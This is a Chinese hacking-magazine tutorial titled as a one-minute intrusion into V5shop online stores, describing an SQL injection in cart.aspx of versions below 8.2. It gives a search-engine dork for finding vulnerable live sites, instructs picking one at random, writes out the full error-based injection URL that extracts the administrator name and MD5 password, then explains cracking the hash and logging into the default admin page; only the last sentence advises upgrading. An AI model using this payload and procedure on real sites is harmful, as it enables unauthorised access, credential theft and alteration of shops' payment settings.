黑客营(39):一分钟入侵V5shop网店

安全阵线

漏洞出处:V5shop网店系统

漏洞危害:获得网店的管理员账号和密码

V5shop是一款国内著名的网店程序,用户通过V5shop只需三步即可搭建一个网店。但在其8.2以下的版本中,存在一个严重的SQL注入漏洞,漏洞存在于cart.aspx页面,该页面是V5shop的购物车页面,由于没有对用户提交的数据进行很好的过滤,黑客通过构造特殊的查询语句,就可以得到网店的管理员账号和密码。测试方法如下:

Step1:在搜索引擎中以“inurl:scoreindex.aspx”为关键字进行搜索,返回的搜索结果中显示的全是使用V5shop网店程序搭建的网站,随机挑选一个网站作为测试目标。

Step2:在网站域名后输入如下注入代码:/cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 ——。

回车后网店页面会显示如下内容:“下面为具体错误信息:在将 varchar 值 '|golfzone|E10ADC3949BA59ABBE56E057F20F883E|' 转换成数据类型 int 时失败”,其中“golfzone”为网店管理员的账号,而“E10ADC3949BA59ABBE56E057F20F883E”是经过MD5加密的管理员密码(图1)。

39-f10-06.jpg
图1

Step3:经过MD5加密的密码无法直接使用,需要先对其进行破解。打开MD5破解网站http://www.md5.com.cn,将密文填入到文本框中,点击“解密”按钮黑客就可以得到密码原文了(本例破解出来的密码原文为123456)。V5shop默认的后台登录地址为weblogin/index.aspx,输入管理员账号和密码即可成功登录网店后台(图2)。

39-f10-07.jpg
图2

黑客进入网店后台后,就可以随意修改网站所有的参数设置,甚至可以修改网店的默认收款方式,危害巨大。建议使用V5shop网店程序的用户立即将程序升级到8.2以上的版本,即可消除漏洞。